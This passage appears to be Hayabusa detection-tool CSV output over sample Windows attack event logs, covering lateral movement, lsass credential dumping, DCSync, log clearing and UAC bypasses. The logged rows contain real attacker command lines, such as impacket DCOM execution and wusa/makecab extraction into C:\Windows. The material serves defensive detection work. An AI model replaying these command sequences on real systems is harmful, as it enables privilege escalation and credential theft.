365ABB72-B180-5CC8-0000-00102BB71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows 
Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
365ABB72-2584-5CC9-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 
365ABB72-D0DA-5CC8-0000-00109B5A3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp 
| User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | LID: 0xffe4 | PID: 2892 | PGUID: 365ABB72-D0E5-5CC8-0000-0010DADF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,PrivEsc,Always Install Elevated MSI Spawned Cmd And Powershell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd | LID: 0xffe4 | PID: 1372 | PGUID: 365ABB72-D1AB-5CC8-0000-0010DB1E4400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx 
+2019-05-02 23:48:53.950 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49178 (IEWIN7.home) | Dst: 151.101.36.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1508 | PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 1508 | Src PGUID: 365ABB72-0244-5CCB-0000-00109AE70B00 | Tgt PID: 484 | Tgt PGUID: 365ABB72-8077-5CCB-0000-0010F2590000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,LSASS Memory 
Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Evas,Security Log Cleared,User: student,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,info,,Admin Logon,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,info,,Logoff,User: tbt570 | LID: 0x1861f7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,high,CredAccess,Mimikatz DC Sync,,../hayabusa-rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_DCSync_4662.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 11:10:43.487 +09:00,DC1.insecurebank.local,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,../hayabusa-rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_DCSync_4662.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 12:00:37.572 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-08 12:00:37.586 +09:00,DC1.insecurebank.local,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.669 +09:00,IEWIN7,13,high,Persis,Bypass UAC Using Event Viewer,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_eventviewer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3752 | PGUID: 
365ABB72-8980-5CD3-0000-0010972D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\eventvwr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3752 | Tgt PGUID: 365ABB72-8980-5CD3-0000-0010972D1F00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x1394a | PID: 3884 | PGUID: 365ABB72-8980-5CD3-0000-00105F451F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0x1394a | PID: 3840 | PGUID: 365ABB72-8980-5CD3-0000-0010134D1F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,Evas | PrivEsc,UAC Bypass via Event Viewer,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\wsqmcons.exe | Process: C:\Windows\System32\wsqmcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-89A1-5CD3-0000-001013732100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" /kickoffelev | Process: C:\Windows\System32\sdclt.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13982 | PID: 3836 | PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:07:56.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\sdclt.exe | Src User: %SourceUser% | Tgt User: 
%TargetUser% | Access: 0x1f1fff | Src PID: 2704 | Src PGUID: 365ABB72-88DC-5CD3-0000-00100DA51A00 | Tgt PID: 3836 | Tgt PGUID: 365ABB72-8B77-5CD3-0000-0010E8FD2900,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ? | LID: 0x1394a | PID: 2264 | PGUID: 365ABB72-8B80-5CD3-0000-001065512A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,PrivEsc,Sdclt Child Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.765 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 1900 | PGUID: 365ABB72-9570-5CD3-0000-00103FC90A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 1292 | PGUID: 365ABB72-95E2-5CD3-0000-001097410F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 
11:52:18.922 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3636 | PGUID: 365ABB72-95E2-5CD3-0000-0010C6440F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3620 | PGUID: 365ABB72-95E2-5CD3-0000-001083470F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 2420 | PGUID: 365ABB72-95E2-5CD3-0000-001074490F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:19.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13aa4 | PID: 3536 | PGUID: 365ABB72-95E3-5CD3-0000-00100C650F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3828 | PGUID: 365ABB72-95E5-5CD3-0000-00101F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13add | PID: 3824 | PGUID: 365ABB72-95E5-5CD3-0000-00108F720F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 